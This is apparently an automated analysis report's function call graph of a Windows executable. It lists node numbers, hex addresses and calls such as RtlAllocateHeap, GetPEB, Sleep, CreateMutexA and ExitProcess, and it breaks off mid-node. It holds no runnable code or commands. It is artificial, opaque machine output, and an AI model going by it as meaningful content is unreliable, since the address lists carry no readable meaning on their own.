be9563 __cftof 11204->11212 11208 bed3e2 RtlAllocateHeap 11205->11208 11205->11212 11206->11203 11207 be955d 11206->11207 11210 bed3e2 RtlAllocateHeap 11207->11210 11208->11212 11209 c06c6a RtlAllocateHeap 11211 be9628 shared_ptr 11209->11211 11210->11212 11211->11197 11212->11209 11213 be95e1 shared_ptr __cftof 11212->11213 11213->11197 12148 bd4276 12149 bd2410 5 API calls 12148->12149 12150 bd427f 12149->12150 12151 bd3ce0 RtlAllocateHeap 12150->12151 12152 bd428f 12151->12152 9866 c06629 9869 c064c7 9866->9869 9872 c064d5 __cftof 9869->9872 9870 c06520 9872->9870 9874 c0652b 9872->9874 9873 c0652a 9880 c0a302 GetPEB 9874->9880 9876 c06535 9877 c0654a __cftof 9876->9877 9878 c0653a GetPEB 9876->9878 9879 c06562 ExitProcess 9877->9879 9878->9877 9881 c0a31c __cftof 9880->9881 9881->9876 9882 bda856 9883 bda870 9882->9883 9884 bda892 shared_ptr 9882->9884 9883->9884 9885 bda94e 9883->9885 9891 be80c0 9884->9891 9887 bda953 Sleep CreateMutexA 9885->9887 9906 c06c6a 9885->9906 9890 bda98e 9887->9890 9889 bda903 9893 be8104 9891->9893 9895 be80de 9891->9895 9892 be81ee 9914 be9270 9892->9914 9893->9892 9897 be817d 9893->9897 9898 be8158 9893->9898 9895->9889 9896 be81f3 9917 bd2480 9896->9917 9902 bed3e2 RtlAllocateHeap 9897->9902 9904 be8169 __cftof 9897->9904 9898->9896 9909 bed3e2 9898->9909 9902->9904 9903 c06c6a RtlAllocateHeap 9903->9892 9904->9903 9905 be81d0 shared_ptr 9904->9905 9905->9889 9907 c06bf6 __cftof RtlAllocateHeap 9906->9907 9908 c06c79 __cftof 9907->9908 9910 bd2480 Concurrency::cancel_current_task __dosmaperr ___std_exception_copy 9909->9910 9913 bed401 Concurrency::cancel_current_task 9910->9913 9921 c038af 9910->9921 9913->9904 9948 bec1b9 9914->9948 9918 bd248e Concurrency::cancel_current_task 9917->9918 9919 c038af ___std_exception_copy RtlAllocateHeap 9918->9919 9920 bd24c3 9919->9920 9922 bd24c3 9921->9922 9923 c038bc ___std_exception_copy 9921->9923 9922->9904 9923->9922 9926 c038e9 9923->9926 9927 c0a1f1 9923->9927 9936 c08ba3 9926->9936 9928 c0a1fe 9927->9928 9929 c0a20c 9927->9929 9928->9929 9933 c0a223 9928->9933 9930 c075f6 __dosmaperr RtlAllocateHeap 9929->9930 9935 c0a214 9930->9935 9932 c0a21e 9932->9926 9933->9932 9934 c075f6 __dosmaperr RtlAllocateHeap 9933->9934 9934->9935 9939 c06c5a 9935->9939 9937 c0adf5 ___free_lconv_mon RtlAllocateHeap 9936->9937 9938 c08bbb 9937->9938 9938->9922 9942 c06bf6 9939->9942 9941 c06c66 9941->9932 9943 c0a7c8 __dosmaperr RtlAllocateHeap 9942->9943 9945 c06c01 __cftof 9943->9945 9944 c06c0f 9944->9941 9945->9944 9946 c06bf6 __cftof RtlAllocateHeap 9945->9946 9947 c06c66 9946->9947 9947->9941 9951 bec123 9948->9951 9950 bec1ca Concurrency::cancel_current_task 9954 bd22e0 9951->9954 9953 bec135 9953->9950 9955 c038af ___std_exception_copy RtlAllocateHeap 9954->9955 9956 bd2317 std::invalid_argument::invalid_argument 9955->9956 9956->9953 12177 bebe50 12180 bebd8b 12177->12180 12179 bebe66 Concurrency::cancel_current_task std::_Throw_future_error 12181 bd22e0 std::invalid_argument::invalid_argument RtlAllocateHeap 12180->12181 12182 bebd9f 12181->12182 12182->12179 11244 bd3c47 11245 bd3c51 11244->11245 11248 bd3c5f 11245->11248 11251 bd32d0 11245->11251 11246 bd3c68 11248->11246 11249 bd3810 4 API calls 11248->11249 11250 bd3cdb 11249->11250 11252 bec6ac GetSystemTimePreciseAsFileTime 11251->11252 11259 bd3314 11252->11259 11253 bd336b 11254 bec26a 5 API calls 11253->11254 11255 bd333c __Mtx_unlock 11254->11255 11257 bec26a 5 API calls 11255->11257 11260 bd3350 std::invalid_argument::invalid_argument 11255->11260 11258 bd3377 11257->11258 11261 bec6ac GetSystemTimePreciseAsFileTime 11258->11261 11259->11253 11259->11255 11270 bebd4c 11259->11270 11260->11248 11262 bd33af 11261->11262 11263 bec26a 5 API calls 11262->11263 11264 bd33b6 __Cnd_broadcast 11262->11264 11263->11264 11265 bec26a 5 API calls 11264->11265 11266 bd33d7 __Mtx_unlock 11264->11266 11265->11266 11267 bec26a 5 API calls 11266->11267 11268 bd33eb 11266->11268 11269 bd340e 11267->11269 11268->11248 11269->11248 11273 bebb72 11270->11273 11272 bebd5c 11272->11259 11274 bebb9c 11273->11274 11275 becf6b _xtime_get GetSystemTimePreciseAsFileTime 11274->11275 11276 bebba4 __Xtime_diff_to_millis2 std::invalid_argument::invalid_argument 11274->11276 11277 bebbcf __Xtime_diff_to_millis2 11275->11277 11276->11272 11277->11276 11278 becf6b _xtime_get GetSystemTimePreciseAsFileTime 11277->11278 11278->11276 11279 bd3440 11284 bd2b30 11279->11284 11281 bd344f Concurrency::cancel_current_task 11282 c038af ___std_exception_copy RtlAllocateHeap 11281->11282 11283 bd3483 11282->11283 11285 c038af ___std_exception_copy RtlAllocateHeap 11284->11285 11286 bd2b68 std::invalid_argument::invalid_argument 11285->11286 11286->11281 11290 bd3840 11291 bd38f6 11290->11291 11294 bd385f 11290->11294 11292 bd3920 11300 be91e0 11292->11300 11294->11291 11294->11292 11296 bd391b 11294->11296 11299 bd38cd shared_ptr 11294->11299 11295 be7d50 RtlAllocateHeap 11295->11291 11298 c06c6a RtlAllocateHeap 11296->11298 11297 bd3925 11298->11292 11299->11295 11301 bec1b9 RtlAllocateHeap 11300->11301 11302 be91ea 11301->11302 11302->11297 9707 c0a7c8 9708 c0a7d2 __dosmaperr 9707->9708 9710 c0a7eb 9708->9710 9718 c0d82f 9708->9718 9711 c0a813 __dosmaperr 9712 c0a853 9711->9712 9713 c0a81b __dosmaperr 9711->9713 9726 c0a49f 9712->9726 9722 c0adf5 9713->9722 9717 c0adf5 ___free_lconv_mon RtlAllocateHeap 9717->9710 9721 c0d83c __dosmaperr 9718->9721 9719 c0d867 RtlAllocateHeap 9720 c0d87a __dosmaperr 9719->9720 9719->9721 9720->9711 9721->9719 9721->9720 9723 c0ae00 9722->9723 9725 c0ae1b __dosmaperr 9722->9725 9723->9725 9730 c075f6 9723->9730 9725->9710 9727 c0a50d __dosmaperr 9726->9727 9744 c0a445 9727->9744 9729 c0a536 9729->9717 9733 c0a7c8 9730->9733 9734 c0a7d2 __dosmaperr 9733->9734 9735 c0d82f __dosmaperr RtlAllocateHeap 9734->9735 9736 c075fb 9734->9736 9737 c0a813 __dosmaperr 9735->9737 9736->9725 9738 c0a853 9737->9738 9739 c0a81b __dosmaperr 9737->9739 9740 c0a49f __dosmaperr RtlAllocateHeap 9738->9740 9741 c0adf5 ___free_lconv_mon RtlAllocateHeap 9739->9741 9742 c0a85e 9740->9742 9741->9736 9743 c0adf5 ___free_lconv_mon RtlAllocateHeap 9742->9743 9743->9736 9745 c0a451 __dosmaperr 9744->9745 9748 c0a626 9745->9748 9747 c0a473 __dosmaperr 9747->9729 9749 c0a65c __cftof 9748->9749 9750 c0a635 __cftof 9748->9750 9749->9747 9750->9749 9752 c0f35f 9750->9752 9753 c0f375 9752->9753 9755 c0f3df 9752->9755 9753->9755 9757 c0f3a8 9753->9757 9762 c0adf5 ___free_lconv_mon RtlAllocateHeap 9753->9762 9756 c0adf5 ___free_lconv_mon RtlAllocateHeap 9755->9756 9779 c0f42d 9755->9779 9758 c0f401 9756->9758 9759 c0f3ca 9757->9759 9767 c0adf5 ___free_lconv_mon RtlAllocateHeap 9757->9767 9760 c0adf5 ___free_lconv_mon RtlAllocateHeap 9758->9760 9761 c0adf5 ___free_lconv_mon RtlAllocateHeap 9759->9761 9763 c0f414 9760->9763 9764 c0f3d4 9761->9764 9766 c0f39d 9762->9766 9768 c0adf5 ___free_lconv_mon RtlAllocateHeap 9763->9768 9769 c0adf5 ___free_lconv_mon RtlAllocateHeap 9764->9769 9765 c0f49b 9770 c0adf5 ___free_lconv_mon RtlAllocateHeap 9765->9770 9780 c0ef3c 9766->9780 9773 c0f3bf 9767->9773 9774 c0f422 9768->9774 9769->9755 9775 c0f4a1 9770->9775 9772 c0adf5 RtlAllocateHeap ___free_lconv_mon 9776 c0f43b 9772->9776 9808 c0f03a 9773->9808 9778 c0adf5 ___free_lconv_mon RtlAllocateHeap 9774->9778 9775->9749 9776->9765 9776->9772 9778->9779 9820 c0f4d0 9779->9820 9781 c0ef4d 9780->9781 9807 c0f036 9780->9807 9782 c0ef5e 9781->9782 9783 c0adf5 ___free_lconv_mon RtlAllocateHeap 9781->9783 9784 c0ef70 9782->9784 9785 c0adf5 ___free_lconv_mon RtlAllocateHeap 9782->9785 9783->9782 9786 c0adf5 ___free_lconv_mon RtlAllocateHeap 9784->9786 9788 c0ef82 9784->9788 9785->9784 9786->9788 9787 c0ef94 9790 c0efa6 9787->9790 9791 c0adf5 ___free_lconv_mon RtlAllocateHeap 9787->9791 9788->9787 9789 c0adf5 ___free_lconv_mon RtlAllocateHeap 9788->9789 9789->9787 9792 c0efb8 9790->9792 9793 c0adf5 ___free_lconv_mon RtlAllocateHeap 9790->9793 9791->9790 9794 c0efca 9792->9794 9795 c0adf5 ___free_lconv_mon RtlAllocateHeap 9792->9795 9793->9792 9796 c0efdc 9794->9796 9797 c0adf5 ___free_lconv_mon RtlAllocateHeap 9794->9797 9795->9794 9798 c0efee 9796->9798 9799 c0adf5 ___free_lconv_mon RtlAllocateHeap 9796->9799 9797->9796 9800 c0f000 9798->9800 9801 c0adf5 ___free_lconv_mon RtlAllocateHeap 9798->9801 9799->9798 9802 c0f012 9800->9802 9803 c0adf5 ___free_lconv_mon RtlAllocateHeap 9800->9803 9801->9800 9804 c0f024 9802->9804 9805 c0adf5 ___free_lconv_mon RtlAllocateHeap 9802->9805 9803->9802 9806 c0adf5 ___free_lconv_mon RtlAllocateHeap 9804->9806 9804->9807 9805->9804 9806->9807 9807->9757 9809 c0f047 9808->9809 9819 c0f09f 9808->9819 9810 c0f057 9809->9810 9811 c0adf5 ___free_lconv_mon RtlAllocateHeap 9809->9811 9812 c0f069 9810->9812 9813 c0adf5 ___free_lconv_mon RtlAllocateHeap 9810->9813 9811->9810 9814 c0f07b 9812->9814 9815 c0adf5 ___free_lconv_mon RtlAllocateHeap 9812->9815 9813->9812 9816 c0adf5 ___free_lconv_mon RtlAllocateHeap 9814->9816 9818 c0f08d 9814->9818 9815->9814 9816->9818 9817 c0adf5 ___free_lconv_mon RtlAllocateHeap 9817->9819 9818->9817 9818->9819 9819->9759 9821 c0f4fc 9820->9821 9822 c0f4dd 9820->9822 9821->9776 9822->9821 9826 c0f0db 9822->9826 9825 c0adf5 ___free_lconv_mon RtlAllocateHeap 9825->9821 9827 c0f1b9 9826->9827 9828 c0f0ec 9826->9828 9827->9825 9862 c0f0a3 9828->9862 9831 c0f0a3 __cftof RtlAllocateHeap 9832 c0f0ff 9831->9832 9833 c0f0a3 __cftof RtlAllocateHeap 9832->9833 9834 c0f10a 9833->9834 9835 c0f0a3 __cftof RtlAllocateHeap 9834->9835 9836 c0f115 9835->9836 9837 c0f0a3 __cftof RtlAllocateHeap 9836->9837 9838 c0f123 9837->9838 9839 c0adf5 ___free_lconv_mon RtlAllocateHeap 9838->9839 9840 c0f12e 9839->9840 9841 c0adf5 ___free_lconv_mon RtlAllocateHeap 9840->9841 9842 c0f139 9841->9842 9843 c0adf5 ___free_lconv_mon RtlAllocateHeap 9842->9843 9844 c0f144 9843->9844 9845 c0f0a3 __cftof RtlAllocateHeap 9844->9845 9846 c0f152 9845->9846 9847 c0f0a3 __cftof RtlAllocateHeap 9846->9847 9848 c0f160 9847->9848 9849 c0f0a3 __cftof RtlAllocateHeap 9848->9849 9850 c0f171 9849->9850 9851 c0f0a3 __cftof RtlAllocateHeap 9850->9851 9852 c0f17f 9851->9852 9853 c0f0a3 __cftof RtlAllocateHeap 9852->9853 9854 c0f18d 9853->9854 9855 c0adf5 ___free_lconv_mon RtlAllocateHeap 9854->9855 9856 c0f198 9855->9856 9857 c0adf5 ___free_lconv_mon RtlAllocateHeap 9856->9857 9858 c0f1a3 9857->9858 9859 c0adf5 ___free_lconv_mon RtlAllocateHeap 9858->9859 9860 c0f1ae 9859->9860 9861 c0adf5 ___free_lconv_mon RtlAllocateHeap 9860->9861 9861->9827 9863 c0f0d6 9862->9863 9864 c0f0c6 9862->9864 9863->9831 9864->9863 9865 c0adf5 ___free_lconv_mon RtlAllocateHeap 9864->9865 9865->9864 11323 bd6db5 11324 bd6dc2 11323->11324 11325 bd6dca 11324->11325 11326 bd6df5 11324->11326 11327 be80c0 RtlAllocateHeap 11325->11327 11328 be80c0 RtlAllocateHeap 11326->11328 11329 bd6deb shared_ptr 11327->11329 11328->11329 11330 bd6ec1 shared_ptr 11329->11330 11331 c06c6a RtlAllocateHeap 11329->11331 11332 bd6ee3 11331->11332 12203 bdb7b1 12204 bdb7be 12203->12204 12205 be7a00 RtlAllocateHeap 12204->12205 12206 bdb7f3 12205->12206 12207 be7a00 RtlAllocateHeap 12206->12207 12208 bdb80b 12207->12208 12209 be7a00 RtlAllocateHeap 12208->12209 12210 bdb823 12209->12210 12211 be7a00 RtlAllocateHeap 12210->12211 12212 bdb835 12211->12212 12213 bd9ba5 12214 bd9ba7 12213->12214 12215 be7a00 RtlAllocateHeap 12214->12215 12216 bd9ca9 12215->12216 12217 bd5c10 4 API calls 12216->12217 12218 bd9cb1 12217->12218 12219 bd8b30 4 API calls 12218->12219 12220 bd9cc2 12219->12220 12221 be8220 RtlAllocateHeap 12220->12221 12222 bd9cd1 12221->12222 12243 bd3f9f 12244 bd3fad 12243->12244 12245 bd3fc5 12243->12245 12246 bd2410 5 API calls 12244->12246 12247 bd3fb6 12246->12247 12248 bd3ce0 RtlAllocateHeap 12247->12248 12248->12245 12252 bd2b90 12253 bd2bce 12252->12253 12254 beb7fb TpReleaseWork 12253->12254 12255 bd2bdb shared_ptr std::invalid_argument::invalid_argument 12254->12255 11389 bd8980 11390 bd8aea 11389->11390 11397 bd89d8 shared_ptr 11389->11397 11391 be7a00 RtlAllocateHeap 11391->11397 11392 bd5c10 4 API calls 11392->11397 11393 bd8b20 11400 be8200 11393->11400 11394 be80c0 RtlAllocateHeap 11394->11397 11396 bd8b25 11398 c06c6a RtlAllocateHeap 11396->11398 11397->11390 11397->11391 11397->11392 11397->11393 11397->11394 11397->11396 11399 bd8b2a 11398->11399 11403 bec1d9 11400->11403 11402 be820a 11406 bec15d 11403->11406 11405 bec1ea Concurrency::cancel_current_task 11405->11402 11407 bd22e0 std::invalid_argument::invalid_argument RtlAllocateHeap 11406->11407 11408 bec16f 11407->11408 11408->11405 11409 bd55f0 11410 bd5610 11409->11410 11411 bd22c0 4 API calls 11410->11411 11412 bd5710 std::invalid_argument::invalid_argument 11410->11412 11411->11410 12276 bd43f0 12277 bebedf InitOnceExecuteOnce 12276->12277 12278 bd440a 12277->12278 12279 bd4411 12278->12279 12280 c06cbb 4 API calls 12278->12280 12281 bd4424 12280->12281 12302 bd3fe0 12303 bd4022 12302->12303 12304 bd408c 12303->12304 12305 bd40d2 12303->12305 12308 bd4035 std::invalid_argument::invalid_argument 12303->12308 12309 bd35e0 12304->12309 12306 bd3ee0 4 API calls 12305->12306 12306->12308 12310 bed3e2 RtlAllocateHeap 12309->12310 12311 bd3616 12310->12311 12315 bd364e Concurrency::cancel_current_task shared_ptr std::invalid_argument::invalid_argument 12311->12315 12316 bd2ce0 12311->12316 12313 bd369e 12314 bd2c00 4 API calls 12313->12314 12313->12315 12314->12315 12315->12308 12317 bd2d1d 12316->12317 12318 bebedf InitOnceExecuteOnce 12317->12318 12319 bd2d46 12318->12319 12320 bd2d51 std::invalid_argument::invalid_argument 12319->12320 12321 bd2d88 12319->12321 12325 bebef7 12319->12325 12320->12313 12323 bd2440 4 API calls 12321->12323 12324 bd2d9b 12323->12324 12324->12313 12326 bebf03 12325->12326 12334 bd2900 12326->12334 12328 bebf23 Concurrency::cancel_current_task 12329 bebf6a 12328->12329 12330 bebf73 12328->12330 12344 bebe7f 12329->12344 12331 bd2ae0 5 API calls 12330->12331 12333 bebf6f 12331->12333 12333->12321 12335 be80c0 RtlAllocateHeap 12334->12335 12336 bd294f 12335->12336 12337 bd26b0 RtlAllocateHeap 12336->12337 12339 bd2967 12337->12339 12338 bd298d shared_ptr 12338->12328 12339->12338 12340 c06c6a RtlAllocateHeap 12339->12340 12341 bd29b6 12340->12341 12342 c038af ___std_exception_copy RtlAllocateHeap 12341->12342 12343 bd29e4 12342->12343 12343->12328 12345 becc31 InitOnceExecuteOnce 12344->12345 12346 bebe97 12345->12346 12347 bebe9e 12346->12347 12348 c06cbb 4 API calls 12346->12348 12347->12333 12349 bebea7 12348->12349 12349->12333 11433 be85e0 11434 be85f6 11433->11434 11434->11434 11435 be8f40 RtlAllocateHeap 11434->11435 11436 be860b 11434->11436 11435->11436 11437 be8de0 11438 be8f2f 11437->11438 11439 be8e05 11437->11439 11440 be9270 RtlAllocateHeap 11438->11440 11442 be8e4c 11439->11442 11443 be8e76 11439->11443 11441 be8f34 11440->11441 11444 bd2480 RtlAllocateHeap 11441->11444 11442->11441 11445 be8e57 11442->11445 11448 bed3e2 RtlAllocateHeap 11443->11448 11450 be8e5d __cftof 11443->11450 11444->11450 11447 bed3e2 RtlAllocateHeap 11445->11447 11446 c06c6a RtlAllocateHeap 11449 be8f3e 11446->11449 11447->11450 11448->11450 11450->11446 11451 be8eed shared_ptr __cftof 11450->11451 12350 bd87d0 12351 bd88d3 12350->12351 12360 bd8819 shared_ptr 12350->12360 12352 be80c0 RtlAllocateHeap 12351->12352 12356 bd8923 12352->12356 12353 bd896c 12355 be8200 RtlAllocateHeap 12353->12355 12354 be80c0 RtlAllocateHeap 12354->12360 12358 bd8971 12355->12358 12357 bd8949 shared_ptr 12356->12357 12359 c06c6a RtlAllocateHeap 12356->12359 12359->12353 12360->12351 12360->12353 12360->12354 12360->12356 12361 c067b7 12362 c067c3 __dosmaperr 12361->12362 12363 c067cd 12362->12363 12366 c067e2 12362->12366 12364 c075f6 __dosmaperr RtlAllocateHeap 12363->12364 12365 c067d2 12364->12365 12367 c06c5a __cftof RtlAllocateHeap 12365->12367 12369 c067dd 12366->12369 12370 c06740 12366->12370 12367->12369 12371 c06762 12370->12371 12372 c0674d 12370->12372 12377 c0675d 12371->12377 12386 c0a038 12371->12386 12373 c075f6 __dosmaperr RtlAllocateHeap 12372->12373 12374 c06752 12373->12374 12376 c06c5a __cftof RtlAllocateHeap 12374->12376 12376->12377 12377->12369 12382 c06785 12403 c0aebb 12382->12403 12385 c0adf5 ___free_lconv_mon RtlAllocateHeap 12385->12377 12387 c06777 12386->12387 12388 c0a050 12386->12388 12392 c0b00b 12387->12392 12388->12387 12389 c0afe4 RtlAllocateHeap 12388->12389 12390 c0a06e 12389->12390 12418 c10439 12390->12418 12393 c0b022 12392->12393 12394 c0677f 12392->12394 12393->12394 12395 c0adf5 ___free_lconv_mon RtlAllocateHeap 12393->12395 12396 c0afe4 12394->12396 12395->12394 12397 c0aff0 12396->12397 12398 c0b005 12396->12398 12399 c075f6 __dosmaperr RtlAllocateHeap 12397->12399 12398->12382 12400 c0aff5 12399->12400 12401 c06c5a __cftof RtlAllocateHeap 12400->12401 12402 c0b000 12401->12402 12402->12382 12404 c0aecc 12403->12404 12409 c0aee1 12403->12409 12405 c075e3 __dosmaperr RtlAllocateHeap 12404->12405 12408 c0aed1 12405->12408 12406 c0af2a 12407 c075e3 __dosmaperr RtlAllocateHeap 12406->12407 12410 c0af2f 12407->12410 12411 c075f6 __dosmaperr RtlAllocateHeap 12408->12411 12409->12406 12412 c0af08 12409->12412 12413 c075f6 __dosmaperr RtlAllocateHeap 12410->12413 12416 c0678b 12411->12416 12436 c0ae2f 12412->12436 12415 c0af37 12413->12415 12417 c06c5a __cftof RtlAllocateHeap 12415->12417 12416->12377 12416->12385 12417->12416 12419 c10445 __dosmaperr 12418->12419 12420 c10465 12419->12420 12421 c1044d 12419->12421 12423 c10500 12420->12423 12430 c10497 12420->12430 12422 c075e3 __dosmaperr RtlAllocateHeap 12421->12422 12424 c10452 12422->12424 12425 c075e3 __dosmaperr RtlAllocateHeap 12423->12425 12426 c075f6 __dosmaperr RtlAllocateHeap 12424->12426 12427 c10505 12425->12427 12434 c1045a 12426->12434 12428 c075f6 __dosmaperr RtlAllocateHeap 12427->12428 12429 c1050d 12428->12429 12431 c06c5a __cftof RtlAllocateHeap 12429->12431 12432 c075f6 __dosmaperr RtlAllocateHeap 12430->12432 12430->12434 12431->12434 12433 c104be 12432->12433 12435 c075e3 __dosmaperr RtlAllocateHeap 12433->12435 12434->12387 12435->12434 12437 c0ae3b __dosmaperr 12436->12437 12438 c0ae70 12437->12438 12439 c0ae7b 12437->12439 12443 c0af48 12438->12443 12441 c075f6 __dosmaperr RtlAllocateHeap 12439->12441 12442 c0ae76 12441->12442 12442->12416 12454 c0c0de 12443->12454 12445 c0af58 12446 c0af90 12445->12446 12447 c0af5e 12445->12447 12448 c0c0de RtlAllocateHeap 12445->12448 12446->12447 12449 c0c0de RtlAllocateHeap 12446->12449 12450 c0afd8 12447->12450 12452 c075c0 __dosmaperr RtlAllocateHeap 12447->12452 12451 c0af87 12448->12451 12449->12447 12450->12442 12453 c0c0de RtlAllocateHeap 12451->12453 12452->12450 12453->12446 12455 c0c100 12454->12455 12456 c0c0eb 12454->12456 12459 c075e3 __dosmaperr RtlAllocateHeap 12455->12459 12461 c0c125 12455->12461 12457 c075e3 __dosmaperr RtlAllocateHeap 12456->12457 12458 c0c0f0 12457->12458 12460 c075f6 __dosmaperr RtlAllocateHeap 12458->12460 12462 c0c130 12459->12462 12463 c0c0f8 12460->12463 12461->12445 12464 c075f6 __dosmaperr RtlAllocateHeap 12462->12464 12463->12445 12465 c0c138 12464->12465 12466 c06c5a __cftof RtlAllocateHeap 12465->12466 12466->12463 11457 bd21c0 11458 bd21cb 11457->11458 11459 bd21d0 11457->11459 11460 bd21d4 11459->11460 11465 bd21ec __cftof 11459->11465 11461 c075f6 __dosmaperr RtlAllocateHeap 11460->11461 11462 bd21d9 11461->11462 11464 c06c5a __cftof RtlAllocateHeap 11462->11464 11463 bd21fc __cftof 11466 bd21e4 11464->11466 11465->11463 11467 bd2221 11465->11467 11469 bd223a 11465->11469 11470 c075f6 __dosmaperr RtlAllocateHeap 11467->11470 11468 bd2231 11469->11468 11471 c075f6 __dosmaperr RtlAllocateHeap 11469->11471 11472 bd2226 11470->11472 11474 bd2247 11471->11474 11473 c06c5a __cftof RtlAllocateHeap 11472->11473 11473->11468 11475 c06c5a __cftof RtlAllocateHeap 11474->11475 11476 bd2252 11475->11476 11495 be79c0 11496 be79e0 11495->11496 11496->11496 11497 be80c0 RtlAllocateHeap 11496->11497 11498 be79f2 11497->11498 12487 c08bbe 12488 c08868 4 API calls 12487->12488 12489 c08bdc 12488->12489 12490 be83c0 12491 be7760 RtlAllocateHeap 12490->12491 12492 be8439 12491->12492 12493 be8f40 RtlAllocateHeap 12492->12493 12494 be8454 12492->12494 12493->12494 12495 be8f40 RtlAllocateHeap 12494->12495 12497 be84a8 12494->12497 12496 be84ee 12495->12496 11503 bd6535 11505 bd6549 shared_ptr 11503->11505 11504 c06c6a RtlAllocateHeap 11506 bd65dc 11504->11506 11505->11504 11507 bd65b1 shared_ptr std::invalid_argument::invalid_argument 11505->11507 11508 be7a00 RtlAllocateHeap 11506->11508 11509 bd66a6 11508->11509 11510 bd5c10 4 API calls 11509->11510 11511 bd66ac 11510->11511 11512 bd5c10 4 API calls 11511->11512 11513 bd66b1 11512->11513 11514 bd22c0 4 API calls 11513->11514 11515 bd66c9 shared_ptr 11514->11515 11516 be7a00 RtlAllocateHeap 11515->11516 11517 bd6732 11516->11517 11518 bd5c10 4 API calls 11517->11518 11519 bd673d 11518->11519 11520 bd22c0 4 API calls 11519->11520 11529 bd6757 shared_ptr 11520->11529 11521 bd6852 11522 be80c0 RtlAllocateHeap 11521->11522 11524 bd689c 11522->11524 11523 be7a00 RtlAllocateHeap 11523->11529 11525 be80c0 RtlAllocateHeap 11524->11525 11528 bd68e3 shared_ptr std::invalid_argument::invalid_argument 11525->11528 11526 bd5c10 4 API calls 11526->11529 11527 bd22c0 4 API calls 11527->11529 11529->11521 11529->11523 11529->11526 11529->11527 11555 bd4120 11556 bd416a 11555->11556 11558 bd41b2 std::invalid_argument::invalid_argument 11556->11558 11559 bd3ee0 11556->11559 11560 bd3f1e 11559->11560 11561 bd3f48 11559->11561 11560->11558 11562 bd3f58 11561->11562 11565 bd2c00 11561->11565 11562->11558 11566 bed3e2 RtlAllocateHeap 11565->11566 11567 bd2c0e 11566->11567 11575 beb847 11567->11575 11569 bd2c49 11569->11558 11570 bd2c42 11570->11569 11581 bd2c80 11570->11581 11572 bd2c58 11584 bd2560 11572->11584 11574 bd2c65 Concurrency::cancel_current_task 11576 beb854 11575->11576 11580 beb873 Concurrency::details::_Reschedule_chore 11575->11580 11587 becb77 11576->11587 11578 beb864 11578->11580 11589 beb81e 11578->11589 11580->11570 11595 beb7fb 11581->11595 11583 bd2cb2 shared_ptr 11583->11572 11585 c038af ___std_exception_copy RtlAllocateHeap 11584->11585 11586 bd2597 std::invalid_argument::invalid_argument 11585->11586 11586->11574 11588 becb92 CreateThreadpoolWork 11587->11588 11588->11578 11590 beb827 Concurrency::details::_Reschedule_chore 11589->11590 11593 becdcc 11590->11593 11592 beb841 11592->11580 11594 becde1 TpPostWork 11593->11594 11594->11592 11596 beb807 11595->11596 11598 beb817 11595->11598 11596->11598 11599 beca78 11596->11599 11598->11583 11600 beca8d TpReleaseWork 11599->11600 11600->11598 12521 be8320 12522 be8339 12521->12522 12523 be834d 12522->12523 12524 be8f40 RtlAllocateHeap 12522->12524 12524->12523 11601 bd211c 11602 bd2126 11601->11602 11603 bed64e RtlAllocateHeap 11602->11603 11604 bd2132 11603->11604 12525 bd2b10 12526 bd2b1c 12525->12526 12527 bd2b1a 12525->12527 12528 bec26a 5 API calls 12526->12528 12529 bd2b22 12528->12529 11608 be8510 11609 be855f 11608->11609 11612 be856c 11608->11612 11614 be9d00 11609->11614 11611 be85c4 11612->11611 11635 bea060 11612->11635 11615 be9e31 11614->11615 11619 be9d25 11614->11619 11616 be9270 RtlAllocateHeap 11615->11616 11627 be9d8b __cftof 11616->11627 11617 c06c6a RtlAllocateHeap 11626 be9e3b 11617->11626 11618 be9e2c 11620 bd2480 RtlAllocateHeap 11618->11620 11619->11618 11621 be9d7a 11619->11621 11622 be9da1 11619->11622 11620->11615 11621->11618 11623 be9d85 11621->11623 11624 bed3e2 RtlAllocateHeap 11622->11624 11622->11627 11625 bed3e2 RtlAllocateHeap 11623->11625 11624->11627 11625->11627 11628 be9e6a shared_ptr 11626->11628 11629 c06c6a RtlAllocateHeap 11626->11629 11627->11617 11630 be9dfc shared_ptr __cftof 11627->11630 11628->11612 11631 be9e8e 11629->11631 11630->11612 11632 be9ec0 shared_ptr 11631->11632 11633 c06c6a RtlAllocateHeap 11631->11633 11632->11612 11634 be9ee6 11633->11634 11636 bea1b1 11635->11636 11640 bea083 11635->11640 11637 be9270 RtlAllocateHeap 11636->11637 11648 bea0e4 __cftof 11637->11648 11638 c06c6a RtlAllocateHeap 11647 bea1bb shared_ptr 11638->11647 11639 bea1ac 11641 bd2480 RtlAllocateHeap 11639->11641 11640->11639 11642 bea0fd 11640->11642 11643 bea0d3 11640->11643 11641->11636 11645 bed3e2 RtlAllocateHeap 11642->11645 11642->11648 11643->11639 11644 bea0de 11643->11644 11646 bed3e2 RtlAllocateHeap 11644->11646 11645->11648 11646->11648 11647->11612 11648->11638 11649 bea16c shared_ptr __cftof 11648->11649 11649->11612 11650 bed111 11652 bed122 11650->11652 11651 bed12a 11652->11651 11654 bed199 11652->11654 11655 bed1a7 SleepConditionVariableCS 11654->11655 11657 bed1c0 11654->11657 11655->11657 11657->11652 12555 bd5f76 12557 bd5f81 shared_ptr 12555->12557 12556 bd5ffe shared_ptr std::invalid_argument::invalid_argument 12557->12556 12558 c06c6a RtlAllocateHeap 12557->12558 12559 bd601b 12558->12559 12560 be80c0 RtlAllocateHeap 12559->12560 12561 bd6089 12560->12561 12562 be80c0 RtlAllocateHeap 12561->12562 12563 bd60bd 12562->12563 12564 be80c0 RtlAllocateHeap 12563->12564 12565 bd60ee 12564->12565 12566 be80c0 RtlAllocateHeap 12565->12566 12567 bd611f 12566->12567 12568 be80c0 RtlAllocateHeap 12567->12568 12570 bd6150 12568->12570 12569 bd65b1 shared_ptr std::invalid_argument::invalid_argument 12570->12569 12571 c06c6a RtlAllocateHeap 12570->12571 12572 bd65dc 12571->12572 12573 be7a00 RtlAllocateHeap 12572->12573 12574 bd66a6 12573->12574 12575 bd5c10 4 API calls 12574->12575 12576 bd66ac 12575->12576 12577 bd5c10 4 API calls 12576->12577 12578 bd66b1 12577->12578 12579 bd22c0 4 API calls 12578->12579 12580 bd66c9 shared_ptr 12579->12580 12580->12580 12581 be7a00 RtlAllocateHeap 12580->12581 12582 bd6732 12581->12582 12583 bd5c10 4 API calls 12582->12583 12584 bd673d 12583->12584 12585 bd22c0 4 API calls 12584->12585 12594 bd6757 shared_ptr 12585->12594 12586 bd6852 12587 be80c0 RtlAllocateHeap 12586->12587 12589 bd689c 12587->12589 12588 be7a00 RtlAllocateHeap 12588->12594 12590 be80c0 RtlAllocateHeap 12589->12590 12593 bd68e3 shared_ptr std::invalid_argument::invalid_argument 12590->12593 12591 bd5c10 4 API calls 12591->12594 12592 bd22c0 